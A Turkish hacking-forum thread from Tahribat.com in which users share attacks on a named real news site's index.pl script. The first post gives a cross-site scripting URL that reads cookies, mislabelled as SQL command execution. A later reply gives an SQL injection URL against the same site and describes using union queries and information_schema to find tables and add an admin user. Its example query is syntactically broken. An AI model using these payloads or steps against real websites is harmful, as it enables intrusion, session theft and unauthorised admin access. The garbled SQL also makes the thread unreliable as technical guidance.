folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Açık



Açık

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sacrifice
    sacrifice's avatar
    Kayıt Tarihi: 25/Ağustos/2005
    Erkek
    "index.pl" script inin id parametresi SQL command çalıştırılmasına izin veriyor.
    ÖR :
    http://www.rockrivertimes.com/index.pl?cmd=viewstory&cat=2&id=">alert(document.cookie)
    PS: alert' in baş ve sonuna script etiketlerini atmayı unutmayın
    #Coding Sacrifice Perl FSO#
    Reply With Quote Alıntı yap
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek
    index.pl de cookiesini almak istediğin yere gel...

    javascript:alert(document.cookie)

    yazısını explorea yaz ve entera tıkla.. cookieni görebilirsin...
    10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
    Reply With Quote Alıntı yap
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek
    bu arada index.pl de koruma yoksa şunu kullanabilirsin tabiki bu sadece örnek gerisini kendin araştırıp bulacaksın

    http://www.rockrivertimes.com/index.pl?cmd=viewstory&cat=2&id=

    yazdıktan sonra idyi bir sayıya eşitleyip daha sonrakı kayıtları ekletip güncelleştirme vs işlemleri için sqldeki union u kullanman lazım örneğin

    http://www.rockrivertimes.com/index.pl?cmd=viewstory&cat=2&id= 1 union update from cat=15

    bu en basitinden en aptalca örneklerden birisiydi. burada bütün categorileri 15 e eşitledik. Aynı şekilde information_schema.tables ı kullanarak tablo adlarını bulabilir ve admin tablosuna yeni user da ekleyebilirsin... sql dökümanlarını ayrıntılı olarak incelersen zor değildir sql injection...
    10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
    Reply With Quote Alıntı yap
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Kayıt Tarihi: 24/Ağustos/2005
    Erkek
    döktürmüş rene hojam yine =)
    Reply With Quote Alıntı yap
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek
    üstüne bişey söylenmez heralde :)
    Amphetamine Logic.
    Reply With Quote Alıntı yap
Toplam Hit: 1378 Toplam Mesaj: 5